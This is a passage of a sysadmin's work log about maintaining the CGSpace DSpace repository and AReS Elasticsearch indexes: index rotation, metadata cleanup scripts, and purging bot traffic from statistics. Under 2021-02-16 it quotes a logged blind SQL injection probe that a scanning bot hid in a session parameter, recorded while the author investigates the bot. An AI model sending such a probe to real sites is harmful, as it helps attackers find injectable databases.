+$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-01-25'
+
    +
  • Resume working on CG Core v2, I realized a few things: +
      +
    • We are trying to move from dc.identifier.issn (and ISBN) to cg.issn, but this is currently implemented as a “qualdrop” input in DSpace’s submission form, which only works to fill in the qualifier (i.e. dc.identifier.xxxx) +
        +
      • If we really want to use cg.issn and cg.isbn we would need to add a new input field for each separately
      • +
      +
    • +
    • We are trying to move the series name/number from dc.relation.ispartofseries to dcterms.isPartOf, but this uses a special “series” input type in DSpace’s submission form that joins the series name and number with a semicolon (;) +
        +
      • If we really want to do that we need to add two separate input fields for each
      • +
      +
    • +
    +
  • +
+

2021-01-25

+
    +
  • Finish indexing AReS and adjusting the indexes (see above)
  • +
  • Merged the changes for the favicon in to the 6_x-prod branch
  • +
  • Meeting with Peter and Abenet about CG Core v2 +
      +
    • We agreed to go ahead with it ASAP and share a list of the changes with Macaroni, Fabio, and others and give them a firm timeline
    • +
    • We also discussed the CSV export option on DSpace 6 and were surprised to see that it kinda works
    • +
    • If you do a free-text search it works properly, but if you try to use the metadata filters it doesn’t
    • +
    • I changed the default setting to make it available to any logged in user and will deploy it on CGSpace this week
    • +
    +
  • +
+

2021-01-26

+
    +
  • Email some CIAT users who submitted items with upper case AGROVOC terms +
      +
    • I will do another global replace soon after they reply
    • +
    +
  • +
  • Add CGIAR Impact Areas and UN Sustainable Development Goals (SDGs) to the 6_x-prod branch
  • +
  • Looking into the issue with exporting search results in XMLUI again +
      +
    • I notice that there is an HTTP 400 when you try to export search results containing a filter
    • +
    • The Tomcat logs show:
    • +
    +
  • +
+
Jan 26, 2021 10:47:23 AM org.apache.coyote.http11.AbstractHttp11Processor process
+INFO: Error parsing HTTP request header
+ Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
+java.lang.IllegalArgumentException: Invalid character found in the request target [/discover/search/csv?query=*&scope=~&filters=author:(Alan\%20Orth)]. The valid characters are defined in RFC 7230 and RFC 3986
+        at org.apache.coyote.http11.InternalInputBuffer.parseRequestLine(InternalInputBuffer.java:213)
+        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1108)
+        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:654)
+        at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:317)
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+        at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+        at java.lang.Thread.run(Thread.java:748)
+
    +
  • I also checked this morning’s REST API logs with goaccess to see who was making heavy use of it:
  • +
+
# grep -E '26/Jan/2021:(08|09|10|11|12)' /var/log/nginx/rest.log | goaccess --log-format=COMBINED -
+
    +
  • The culprit seems to be the ILRI publications importer, so that’s OK
  • +
  • But I also see an IP in Jordan hitting the REST API 1,100 times today:
  • +
+
80.10.12.54 - - [26/Jan/2021:09:43:42 +0100] "GET /rest/rest/bitstreams/98309f17-a831-48ed-8f0a-2d3244cc5a1c/retrieve HTTP/2.0" 302 138 "http://wp.local/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
+
    +
  • Seems to be someone from CodeObia working on WordPress +
      +
    • I told them to please use a bot user agent so it doesn’t affect our stats, and to use DSpace Test if possible
    • +
    +
  • +
  • I purged all ~3,000 statistics hits that have the “http://wp.local/” referrer:
  • +
+
$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>referrer:http\:\/\/wp\.local\/</query></delete>"
+
+

2021-01-27

+
    +
  • Abenet approved my submission to CGSpace for the CSV metadata quality checker: https://hdl.handle.net/10568/110997
  • +
  • Add SDGs and Impact Areas to the XMLUI item display
  • +
  • Last week Atmire got back to me about the duplicates in Solr +
      +
    • The deduplicator appears to be working, but you need to limit the number of records, for example -r 100, so it doesn’t crash from running out of memory
    • +
    • They pointed to a few records matching solr_update_time_stamp:1605635765897 that had hundreds of duplicates, which are now gone on DSpace Test (though still present if you look on the production server)
    • +
    • I need to try this again before doing it on CGSpace
    • +
    +
  • +
+

2021-01-28

+
    +
  • I did some more work on CG Core v2 +
      +
    • I tested using cg.number twice in the submission form: once for journal issue, and once for series number
    • +
    • DSpace gets confused and ends up storing the number twice, even if you only enter it in one of the fields
    • +
    • I suggested to Marie that we use cg.issue for journal issue, since we’re already going to use cg.volume
    • +
    • That would free up cg.number for use by series number
    • +
    +
  • +
  • I deployed the SDGs, Impact Areas, and favicon changes to CGSpace and posted a note on Yammer for the editors +
      +
    • Also ran all system updates and rebooted the server (linode18)
    • +
    +
  • +
+

2021-01-31

+
    +
  • AReS Explorer has been down since yesterday for some reason +
      +
    • First I ran all updates and rebooted the server (linode20)
    • +
    • Then start a re-index, first deleting the old Elasticsearch temp index:
    • +
    +
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+# start indexing in AReS
+
    +
  • Sent out emails about CG Core v2 to Macaroni Bros, Fabio, Hector at CCAFS, Dani and Tariku
  • +
  • A bit more minor work on testing the series/report/journal changes for CG Core v2
  • +
+

February, 2021

2021-02-01

+
    +
  • Abenet said that CIP found more duplicate records in their export from AReS + +
  • +
  • I had a call with CodeObia to discuss the work on OpenRXV
  • +
  • Check the results of the AReS harvesting from last night:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 100875,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
    +
  • Set the current items index to read only and make a backup:
  • +
+
$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-01
+
    +
  • Delete the current items index and clone the temp one to it:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items'
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+
    +
  • Then delete the temp and backup:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+{"acknowledged":true}%
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-01'
+
    +
  • Meeting with Peter and Abenet about CGSpace goals and progress
  • +
  • Test submission to DSpace via REST API to see if Abenet can fix / reject it (submit workflow?)
  • +
  • Get Peter a list of users who have submitted or approved on DSpace everrrrrrr, so he can remove some
  • +
  • Ask MEL for a dump of their types to reconcile with ours and CG Core
  • +
  • Need to tag the ILRI collections with licenses!! For pre-2010 use “Other” unless a license is already there; for 2010-2020 do the ILRI content in batches (2010-2015: CC-BY-NC-SA; 2016 onwards: CC-BY) +
      +
    • ONLY if ILRI / International Livestock Research Institute is the publisher, no journal articles, no book chapters…
    • +
    +
  • +
  • I tried to export the ILRI community from CGSpace but I got an error:
  • +
+
$ dspace metadata-export -i 10568/1 -f /tmp/2021-02-01-ILRI.csv
+Loading @mire database changes for module MQM
+Changes have been processed
+Exporting community 'International Livestock Research Institute (ILRI)' (10568/1)
+           Exception: null
+java.lang.NullPointerException
+        at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
+        at com.google.common.collect.Iterators.concat(Iterators.java:464)
+        at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
+        at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
+        at org.dspace.app.bulkedit.MetadataExport.<init>(MetadataExport.java:77)
+        at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+
    +
  • I imported the production database to my local development environment and I get the same error… WTF is this? +
      +
    • I was able to export another smaller community
    • +
    • I filed an issue with Atmire to see if it is likely something of theirs, or if I need to ask on the dspace-tech mailing list
    • +
    +
  • +
  • CodeObia sent a pull request with fixes for several issues we highlighted in OpenRXV +
      +
    • I deployed the fixes on production, as they only affect minor parts of the frontend, and two of the four are working
    • +
    • I sent feedback to CodeObia
    • +
    +
  • +
+

2021-02-02

+
    +
  • Communicate more with CodeObia about some fixes for OpenRXV
  • +
  • Maria Garruccio sent me some new ORCID iDs for Bioversity authors, as well as a correction for Stefan Burkart’s iD
  • +
  • I saved the new ones to a text file, combined them with the others, extracted the ORCID iDs themselves, and updated the names using resolve-orcids.py:
  • +
+
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-02-02-combined-orcids.txt
+$ ./ilri/resolve-orcids.py -i /tmp/2021-02-02-combined-orcids.txt -o /tmp/2021-02-02-combined-orcid-names.txt
+
    +
  • I sorted the names and added the XML formatting in vim, then ran it through tidy:
  • +
+
$ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+
    +
  • Then I added all the changed names plus Stefan’s incorrect ones to a CSV and processed them with fix-metadata-values.py:
  • +
+
$ cat 2021-02-02-fix-orcid-ids.csv 
+cg.creator.id,correct
+Burkart Stefan: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
+Burkart Stefan: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
+Stefan  Burkart: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
+Stefan Burkart: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
+Adina Chain Guadarrama: 0000-0002-6944-2064,Adina Chain-Guadarrama: 0000-0002-6944-2064
+Bedru: 0000-0002-7344-5743,Bedru B. Balana: 0000-0002-7344-5743
+Leigh Winowiecki: 0000-0001-5572-1284,Leigh Ann Winowiecki: 0000-0001-5572-1284
+Sander J. Zwart: 0000-0002-5091-1801,Sander Zwart: 0000-0002-5091-1801
+saul lozano-fuentes: 0000-0003-1517-6853,Saul Lozano: 0000-0003-1517-6853
+$ ./ilri/fix-metadata-values.py -i 2021-02-02-fix-orcid-ids.csv -db dspace63 -u dspace -p 'fuuu' -f cg.creator.id -t 'correct' -m 240
+
    +
  • I also looked up which of these new authors might have existing items that are missing ORCID iDs
  • +
  • I had to port my add-orcid-identifiers-csv.py to DSpace 6 UUIDs and I think it’s working but I want to do a few more tests because it uses a sequence for the metadata_value_id
  • +
+
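    +
  • For reference, this is the sequence the script pulls new metadata_value_id values from (assuming it is still called metadatavalue_seq in DSpace 6); its current position can be checked with:
  • +
+
$ psql -d dspace63 -c "SELECT last_value FROM metadatavalue_seq;"
+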

2021-02-03

+
    +
  • Tag forty-three items from Bioversity’s new authors with ORCID iDs using add-orcid-identifiers-csv.py:
  • +
+
$ cat /tmp/2021-02-02-add-orcid-ids.csv
+dc.contributor.author,cg.creator.id
+"Nchanji, E.",Eileen Bogweh Nchanji: 0000-0002-6859-0962
+"Nchanji, Eileen",Eileen Bogweh Nchanji: 0000-0002-6859-0962
+"Nchanji, Eileen Bogweh",Eileen Bogweh Nchanji: 0000-0002-6859-0962
+"Machida, Lewis",Lewis Machida: 0000-0002-0012-3997
+"Mockshell, Jonathan",Jonathan Mockshell: 0000-0003-1990-6657"
+"Aubert, C.",Celine Aubert: 0000-0001-6284-4821
+"Aubert, Céline",Celine Aubert: 0000-0001-6284-4821
+"Devare, M.",Medha Devare: 0000-0003-0041-4812
+"Devare, Medha",Medha Devare: 0000-0003-0041-4812
+"Benites-Alfaro, O.E.",Omar E. Benites-Alfaro: 0000-0002-6852-9598
+"Benites-Alfaro, Omar Eduardo",Omar E. Benites-Alfaro: 0000-0002-6852-9598
+"Johnson, Vincent",VINCENT JOHNSON: 0000-0001-7874-178X
+"Lesueur, Didier",didier lesueur: 0000-0002-6694-0869
+$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-02-02-add-orcid-ids.csv -db dspace -u dspace -p 'fuuu' -d
+
+

2021-02-04

+
    +
  • Re-sync CGSpace database and Solr to DSpace Test to start a public test of CG Core v2 +
      +
    • Afterwards I updated Discovery and OAI:
    • +
    +
  • +
+
$ time chrt -b 0 dspace index-discovery -b
+$ dspace oai import -c
+
    +
  • Attend Accenture meeting for repository managers +
      +
    • Not clear what the SMO wants to get out of us
    • +
    +
  • +
  • Enrico asked for some notes about our work on AReS in 2020 for CRP Livestock reporting +
      +
    • Abenet and I came up with the following:
    • +
    +
  • +
+
+

In 2020 we funded the third phase of development on the OpenRXV platform that powers AReS. This phase focused mainly on improving the search filtering, graphical visualizations, and reporting capabilities. It is now possible to create custom reports in Excel, Word, and PDF formats using a templating system. We also concentrated on making the vanilla OpenRXV platform easier to deploy and administer in hopes that other organizations would begin using it. Lastly, we identified and fixed a handful of bugs in the system. All development takes place publicly on GitHub: https://github.com/ilri/OpenRXV.

+
+
+

In the last quarter of 2020, ILRI conducted a briefing for nearly 100 scientists and communications staff on how to use AReS as a visualization tool for repository outputs and as a reporting tool (https://hdl.handle.net/10568/110527). Staff will begin using AReS to generate lists of their outputs to upload to the performance evaluation system to assist in their performance evaluation. The list of publications they will upload from AReS to Performax will indicate the open access status of each publication, to help start a discussion about why some outputs are not open access given the open access policies of the CGIAR.

+
+
    +
  • Call Moayad to discuss OpenRXV development +
      +
    • We talked about the “reporting period” (date-based statistics) and some of the issues Abdullah is working on on GitHub
    • +
    • I suggested that we offer the date-range statistics in a modal dialog with other sorting and grouping options during report generation
    • +
    +
  • +
  • Peter sent me the cleaned up series that I had originally sent him in 2020-10 +
      +
    • I quickly applied all the deletions on CGSpace:
    • +
    +
  • +
+
$ ./ilri/delete-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p 'fuuu' -f dc.relation.ispartofseries -m 43
+
    +
  • The corrected versions have a lot of encoding issues so I asked Peter to give me the correct ones so I can search/replace them: +
      +
    • CIAT Publicaçao
    • +
    • CIAT Publicación
    • +
    • CIAT Série
    • +
    • CIAT Séries
    • +
    • Colección investigación y desarrollo
    • +
    • CTA Guias práticos
    • +
    • CTA Guias técnicas
    • +
    • Curso de adiestramiento en producción y utilización de pastos tropicales
    • +
    • Folheto Técnico
    • +
    • ILRI Nota Informativa de Investigação
    • +
    • Influencia de los actores sociales en América Central
    • +
    • Institutionalization of quality assurance mechanism and dissemination of top quality commercial products to increase crop yields and improve food security of smallholder farmers in sub-Saharan Africa – COMPRO-II
    • +
    • Manuel pour les Banques de Gènes;1
    • +
    • Sistematización de experiencias Proyecto ACORDAR
    • +
    • Strüngmann Forum
    • +
    • Unité de Recherche
    • +
    +
  • +
  • I ended up using python-ftfy to fix those very easily, then replaced them in the CSV (a one-liner sketch is below, after the fix-metadata-values.py command)
  • +
  • Then I trimmed whitespace at the beginning, end, and around the “;”, and applied the 1,600 fixes using fix-metadata-values.py:
  • +
+
$ ./ilri/fix-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p 'fuuu' -f dc.relation.ispartofseries -t 'correct' -m 43
+
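    +
  • The ftfy step itself can be as simple as piping the text through fix_text (a sketch; the file names are illustrative):
  • +
+
$ python3 -c "import sys, ftfy; sys.stdout.write(ftfy.fix_text(sys.stdin.read()))" < /tmp/series-mojibake.csv > /tmp/series-fixed.csv
+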
    +
  • Help Peter debug an issue with one of Alan Duncan’s new FEAST Data reports on CGSpace +
      +
    • For some reason the default policy for the item was “COLLECTION_492_DEFAULT_READ” group, which had zero members
    • +
    • I changed them all to Anonymous and the item was accessible
    • +
    +
  • +
+

2021-02-07

+
    +
  • Run system updates on CGSpace (linode18), deploy latest 6_x-prod branch, and reboot the server
  • +
  • After the server came back up I started a full Discovery re-indexing:
  • +
+
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    247m30.850s
+user    160m36.657s
+sys     2m26.050s
+
    +
  • Regarding the CG Core v2 migration, Fabio wrote to tell me that he is not using CGSpace directly, instead harvesting via GARDIAN +
      +
    • He gave me the contact of Sotiris Konstantinidis, who is the CTO at SCIO Systems and works on the GARDIAN platform
    • +
    +
  • +
  • Delete the old Elasticsearch temp index to prepare for starting an AReS re-harvest:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+# start indexing in AReS
+

2021-02-08

+
    +
  • Finish rotating the AReS indexes after the harvesting last night:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 100983,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write":true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-08
+$ curl -XDELETE 'http://localhost:9200/openrxv-items'
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-08'
+

2021-02-10

+
    +
  • Talk to Abdullah from CodeObia about a few of the issues we filed on OpenRXV + +
  • +
  • Atmire responded to a few issues today: +
      +
    • First, the one about a crash while exporting a community CSV, which appears to be a vanilla DSpace issue with a patch in DSpace 6.4
    • +
    • Second, the MQM batch consumer issue, which appears to be harmless log spam in most cases and they have sent a patch that adjusts the logging as such
    • +
    • Third, a version bump for CUA to fix the java.lang.UnsupportedOperationException: Multiple update components target the same field:solr_update_time_stamp error
    • +
    +
  • +
  • I cherry-picked the patches for DS-4111 and was able to export the ILRI community finally, but the results are almost twice as many items as in the community! +
      +
    • Investigating with csvcut I see there are some ids that appear up to five, six, or seven times!
    • +
    +
  • +
+
$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | wc -l
+30354
+$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | sort -u | wc -l
+18555
+$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | sort | uniq -c | sort -h | tail
+      5 c21a79e5-e24e-4861-aa07-e06703d1deb7
+      5 c2460aa1-ae28-4003-9a99-2d7c5cd7fd38
+      5 d73fb3ae-9fac-4f7e-990f-e394f344246c
+      5 dc0e24fa-b7f5-437e-ac09-e15c0704be00
+      5 dc50bcca-0abf-473f-8770-69d5ab95cc33
+      5 e714bdf9-cc0f-4d9a-a808-d572e25c9238
+      6 7dfd1c61-9e8c-4677-8d41-e1c4b11d867d
+      6 fb76888c-03ae-4d53-b27d-87d7ca91371a
+      6 ff42d1e6-c489-492c-a40a-803cabd901ed
+      7 094e9e1d-09ff-40ca-a6b9-eca580936147
+
    +
  • I added a comment to that bug to ask if this is a side effect of the patch
  • +
  • I started working on tagging pre-2010 ILRI items with license information, like we talked about with Peter and Abenet last week +
      +
    • Due to the export bug I had to sort and remove duplicates first, then use csvgrep to filter out books and journal articles:
    • +
    +
  • +
+
$ csvcut -c 'id,dc.date.issued,dc.date.issued[],dc.date.issued[en_US],dc.rights,dc.rights[],dc.rights[en],dc.rights[en_US],dc.publisher,dc.publisher[],dc.publisher[en_US],dc.type[en_US]' /tmp/2021-02-10-ILRI.csv | csvgrep -c 'dc.type[en_US]' -r '^.+[^(Journal Item|Journal Article|Book|Book Chapter)]'
+
    +
  • I imported the CSV into OpenRefine and converted the date text values to date types so I could facet by dates before 2010:
  • +
+
if(diff(value,"01/01/2010".toDate(),"days")<0, true, false)
+
    +
  • Then I filtered by publisher to make sure they were only ours:
  • +
+
or(
+  value.contains("International Livestock Research Institute"),
+  value.contains("ILRI"),
+  value.contains("International Livestock Centre for Africa"),
+  value.contains("ILCA"),
+  value.contains("ILRAD"),
+  value.contains("International Laboratory for Research on Animal Diseases")
+)
+
    +
  • I tagged these pre-2010 items with “Other” if they didn’t already have a license
  • +
  • I checked 2010 to 2015, and 2016 to date, but they were all tagged already!
  • +
  • In the end I added the “Other” license to 1,523 items from before 2010
  • +
+

2021-02-11

+
    +
  • CodeObia keeps working on a few more small issues on OpenRXV +
      +
    • Abdullah sent fixes for two issues but I couldn’t verify them myself so I asked him to check again
    • +
    • Call with Abdullah and Yousef to discuss some issues
    • +
    • We got the Angular expressions parser working…
    • +
    +
  • +
+

2021-02-13

+
    +
  • Run system updates, deploy latest 6_x-prod branch, and reboot CGSpace (linode18)
  • +
  • Normalize text_lang of DSpace item metadata on CGSpace:
  • +
+
dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
+ text_lang |  count  
+-----------+---------
+ en_US     | 2567413
+           |    8050
+ en        |    7601
+           |       0
+(4 rows)
+dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item);
+
    +
  • Start a full Discovery re-indexing on CGSpace
  • +
+

2021-02-14

+
    +
  • Clear the OpenRXV temp items index:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+
    +
  • Then start a full harvesting of CGSpace in the AReS Explorer admin dashboard
  • +
  • Peter asked me about a few other recently submitted FEAST items that are restricted +
      +
    • I checked the collection and there was an empty group there for the “default read” authorization
    • +
    • I deleted the group and fixed the authorization policies for two new items manually
    • +
    +
  • +
  • Upload fifteen items to CGSpace for Peter Ballantyne
  • +
  • Move 313 journals from series, which Peter had indicated when we were cleaning up the series last week +
      +
    • I re-purposed one of my Python metadata scripts to create move-metadata-values.py
    • +
    • The script reads a text file with one metadata value per line and moves them from one metadata field id to another
    • +
    +
  • +
+
$ ./ilri/move-metadata-values.py -i /tmp/move.txt -db dspace -u dspace -p 'fuuu' -f 43 -t 55
+
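    +
  • Under the hood each move amounts to an UPDATE of the metadata_field_id, roughly like this (a sketch with an illustrative series name; 43 and 55 match the -f and -t options above):
  • +
+
$ psql -d dspace -c "UPDATE metadatavalue SET metadata_field_id=55 WHERE metadata_field_id=43 AND text_value='Some Journal Name' AND dspace_object_id IN (SELECT uuid FROM item);"
+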

2021-02-15

+
    +
  • Check the results of the AReS Harvesting from last night:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 101126,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
    +
  • Set the current items index to read only and make a backup:
  • +
+
$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-15
+
    +
  • Delete the current items index and clone the temp one:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items'
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-15'
+
    +
  • Call with Abdullah from CodeObia to discuss community and collection statistics reporting
  • +
+

2021-02-16

+
    +
  • Linode emailed me to say that CGSpace (linode18) had a high CPU usage this afternoon
  • +
  • I looked in the nginx logs and found a few heavy users: +
      +
    • 45.146.165.203 in Russia with user agent Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.2.15 Version/10.00
    • +
    • 130.255.161.231 in Sweden with user agent Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0
    • +
    +
  • +
  • They are definitely bots posing as users, as I see they have created six thousand DSpace sessions today:
  • +
+
$ cat dspace.log.2021-02-16 | grep -E 'session_id=[A-Z0-9]{32}:ip_addr=45.146.165.203' | sort | uniq | wc -l
+4007
+$ cat dspace.log.2021-02-16 | grep -E 'session_id=[A-Z0-9]{32}:ip_addr=130.255.161.231' | sort | uniq | wc -l
+2128
+
    +
  • Ah, actually 45.146.165.203 is making requests like this:
  • +
+
"http://cgspace.cgiar.org:80/bitstream/handle/10568/238/Res_report_no3.pdf;jsessionid=7311DD88B30EEF9A8F526FF89378C2C5%' AND 4313=CONCAT(CHAR(113)+CHAR(98)+CHAR(106)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (4313=4313) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113)) AND 'XzQO%'='XzQO"
+
    +
  • I purged the hits from these two using my check-spider-ip-hits.sh:
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
+Purging 4005 hits from 45.146.165.203 in statistics
+Purging 3493 hits from 130.255.161.231 in statistics
+
+Total number of bot hits purged: 7498
+
    +
  • Ugh, I looked in Solr for the top IPs in 2021-01 and found a few more of these Russian IPs so I purged them too:
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
+Purging 27163 hits from 45.146.164.176 in statistics
+Purging 19556 hits from 45.146.165.105 in statistics
+Purging 15927 hits from 45.146.165.83 in statistics
+Purging 8085 hits from 45.146.165.104 in statistics
+
+Total number of bot hits purged: 70731
+
    +
  • My god, and 64.39.99.15 is from Qualys, the domain scanning security people, who are making queries trying to see if we are vulnerable or something (wtf?) +
      +
    • Looking in Solr I see a few different IPs with DNS like sn003.s02.iad01.qualys.com. so I will purge their requests too:
    • +
    +
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
+Purging 3 hits from 130.255.161.231 in statistics
+Purging 16773 hits from 64.39.99.15 in statistics
+Purging 6976 hits from 64.39.99.13 in statistics
+Purging 13 hits from 64.39.99.63 in statistics
+Purging 12 hits from 64.39.99.65 in statistics
+Purging 12 hits from 64.39.99.94 in statistics
+
+Total number of bot hits purged: 23789
+

2021-02-17

+
    +
  • I tested Node.js 10 vs 12 on CGSpace (linode18) and DSpace Test (linode26) and the build times were surprisingly similar +
      +
    • Node.js 10 +
        +
      • linode26: [INFO] Total time: 17:07 min
      • +
      • linode18: [INFO] Total time: 19:26 min
      • +
      +
    • +
    • Node.js 12 +
        +
      • linode26: [INFO] Total time: 17:14 min
      • +
      • linode18: [INFO] Total time: 19:43 min
      • +
      +
    • +
    +
  • +
  • So I guess there is no need to use Node.js 12 any time soon, unless 10 becomes end of life
  • +
  • Abenet asked me to add Tom Randolph’s ORCID identifier to CGSpace
  • +
  • I also tagged all his 247 existing items on CGSpace:
  • +
+
$ cat 2021-02-17-add-tom-orcid.csv 
+dc.contributor.author,cg.creator.id
+"Randolph, Thomas F.","Thomas Fitz Randolph: 0000-0003-1849-9877"
+$ ./ilri/add-orcid-identifiers-csv.py -i 2021-02-17-add-tom-orcid.csv -db dspace -u dspace -p 'fuuu'
+

2021-02-20

+
    +
  • Test the CG Core v2 migration on DSpace Test (linode26) one last time
  • +
+

2021-02-21

+
    +
  • Start the CG Core v2 migration on CGSpace (linode18)
  • +
  • After deploying the latest 6_x-prod branch and running migrate-fields.sh I started a full Discovery reindex:
  • +
+
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    311m12.617s
+user    217m3.102s
+sys     2m37.363s
+
    +
  • Then update OAI:
  • +
+
$ dspace oai import -c
+$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
+
    +
  • Ben Hack was asking if there is a REST API query that will give him all ILRI outputs for their new Sharepoint intranet +
      +
    • I told him he can try to use something like this if it’s just something like the ILRI articles in journals collection:
    • +
    +
  • +
+

https://cgspace.cgiar.org/rest/collections/8ea4b611-1f59-4d4e-b78d-a9921a72cfe7/items?limit=100&offset=0

+
    +
  • But I don’t know if he wants the entire ILRI community, in which case he needs to get the collections recursively and iterate over them, or if his software can manage the iteration over the pages of item results using limit and offset (a quick sketch of that approach is at the end of today’s notes)
  • +
  • Help proof and upload 1095 CIFOR items to DSpace Test for Abenet +
      +
    • There were a few dozen issues with author affiliations, but the metadata was otherwise very good quality
    • +
    • I ran the data through the csv-metadata-quality tool nevertheless to fix some minor formatting issues
    • +
    • I uploaded it to DSpace Test to check for duplicates
    • +
    +
  • +
+
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx1024m'
+$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/cifor.csv
+
    +
  • The process took an hour or so!
  • +
  • I added colorized output to the csv-metadata-quality tool and tagged version 0.4.4 on GitHub
  • +
  • I updated the fields in AReS Explorer and then removed the old temp index so I can start a fresh re-harvest of CGSpace:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+# start indexing in AReS
+
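    +
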